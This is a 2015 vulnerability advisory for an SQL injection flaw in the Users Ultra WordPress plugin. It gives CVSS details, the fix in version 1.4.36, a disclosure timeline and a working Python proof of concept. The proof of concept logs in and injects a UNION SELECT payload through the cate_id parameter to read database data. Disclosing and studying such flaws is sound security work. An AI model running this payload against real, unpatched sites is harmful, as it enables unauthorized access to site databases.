Users Ultra 1.4.35, SQL Injection
The AJAX action ‘edit_photo_cate’, which is defined in the file ‘users-ultra/addons/photocategories/admin/admin.php’, allows for SQL Injection via the POST parameter ‘cate_id’. This parameter is used in a call to the WordPress function ‘$wpdb->get_results()’ without being sanitized. This action is available to any logged in user.
Homepage
https://wordpress.org/plugins/users-ultra/
CVSS Score
5.5
CSSS Vector
(AV:N/AC:L/Au:S/C:P/I:P/A:N)
Attack Scope
remote
Authorization Required
Registered
Mitigation
Update to version 1.4.36.
Proof of Concept
The below PoC will output the first second column of the injection into the ‘value’ field of the first input element in the result. In this case, it’s the name of the current database, ‘wordpress’. The second column is also output in the ‘data-id’ attribute in the second and third input elements, however in this example we’re selecting NULL.
import requests
s = requests.session()
blog_url = 'http://localhost'
# Login to WordPress
url = '%s/wp-login.php'%blog_url
payload = {
"log":"test",
"pwd":"test",
"wp-submit":"Log+In"
}
r = s.post(url, data=payload)
# Trigger our MySQL injection
url = '%s/wp-admin/admin-ajax.php'%blog_url
payload = {
"action":"edit_photo_cate",
"cate_id":"0 UNION ALL SELECT NULL,CAST(DATABASE() AS CHAR)#"
}
r = s.post(url, data=payload)
print r.textOutput
~$ python g0blin-00030.py
<p>Name:</p><p><input type='text' value='wordpress' class='xoouserultra-input' id='uultra_photo_name_edit_'></p><p><input type='button' class='button-primary uultra-photocat-close' value='Close' data-id= > <input type='button' class='button-primary uultra-photocat-modify' data-id= value='Save'> </p>Timeline
- 2015-02-02: Discovered
- 2015-02-02: Vendor notified
- 2015-02-02: Vendor responded
- 2015-02-02: Version 1.4.36 released – issue resolved
- 2015-02-09: Advisory released